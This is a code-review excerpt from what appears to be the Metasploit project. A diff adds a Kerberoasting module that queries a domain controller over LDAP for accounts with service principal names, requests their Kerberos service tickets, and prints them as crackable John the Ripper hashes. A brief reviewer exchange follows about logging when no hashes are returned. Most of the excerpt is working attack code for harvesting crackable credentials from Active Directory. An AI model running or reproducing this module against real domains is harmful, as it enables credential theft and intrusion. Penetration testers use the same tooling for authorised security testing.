modules/auxiliary/gather/kerberoast.rb

```diff
@@ -0,0 +1,214 @@
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => [],
+          'AKA' => ['GetUserSpns.py', 'get_user_spns']
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RHOSTS(nil, true, 'The target KDC, see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html'),
+        OptString.new('TARGET_USER', [ false, 'Specific user to kerberoast' ]),
+        OptString.new('Rhostname', [ false, "The domain controller's hostname"], aliases: ['LDAP::Rhostname']),
+        Msf::OptAddress.new('DomainControllerRhost', [false, 'The resolvable rhost for the Domain Controller'], fallbacks: ['rhost']),
+      ]
+    )
+    register_option_group(name: 'SESSION',
+                          description: 'Used when connecting to LDAP over an existing SESSION',
+                          option_names: %w[RHOSTS],
+                          required_options: %w[SESSION RHOSTS])
+    register_advanced_options(
+      [
+        OptEnum.new('LDAP::Auth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::NTLM, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),
+      ]
+    )
+  end
+
+  def run
+    if datastore['TARGET_USER'].nil?
+      run_ldap
+    else
+      run_user
+    end
+  end
+
+  def run_user
+    user = datastore['TARGET_USER']
+    filter = "(&(objectClass=user)(sAMAccountName=#{Net::LDAP::Filter.escape(user)}))"
+    attributes = ['servicePrincipalName', 'sAMAccountName']
+    spn = nil
+    count = run_ldap_query(filter, attributes) do |result|
+      if result.respond_to?(:serviceprincipalname)
+        spn = result.serviceprincipalname[0]
+      end
+    end
+    if count == 0
+      fail_with(Failure::BadConfig, "User #{user} not found")
+    elsif spn.nil?
+      fail_with(Failure::BadConfig, "User #{user} has no SPN")
+    end
+    begin
+      jtr = roast(user, spn)
+      jtr_format = Metasploit::Framework::Hashes.identify_hash(jtr)
+      report_hash(jtr, jtr_format)
+      print_good("Success: \n#{jtr}")
+    rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+      print_error("#{user} reported as kerberoastable, but received error when attempting to retrieve TGS (#{e})")
+    end
+  end
+
+  def run_ldap
+    jtr_formats = Set.new
+    hashes = []
+    run_builtin_ldap_query('ENUM_USER_SPNS_KERBEROAST') do |result|
+      spn = result.serviceprincipalname[0]
+      username = result.samaccountname[0]
+      begin
+        jtr = roast(username, spn)
+        hashes.append(jtr)
+        jtr_format = Metasploit::Framework::Hashes.identify_hash(jtr)
+        jtr_formats.add(jtr_format)
+        report_hash(jtr, jtr_format)
+      rescue ::Rex::Proto::Kerberos::Model::Error::KerberosError => e
+        print_error("#{username} reported as kerberoastable, but received error when attempting to retrieve TGS (#{e})")
+      end
+    end
+    if hashes.empty?
+      return
```

Comment:
Would it make sense to log a message here that we got no hashes, or will there always be something logged in other places?
My reasoning being:
- User runs the `run` method
- We experience no errors
- `hashes` remains empty
- User gets no output in their console

Reply:
The `#run_builtin_ldap_query` method does print that no results were found for the LDAP filter so something would be printed. It probably makes sense to log something here though for clarity that not finding any entries means we found no hashes and in case the `#run_builtin_ldap_query` method changes. I'll add this myself since I think it's easy enough and should get this unblocked.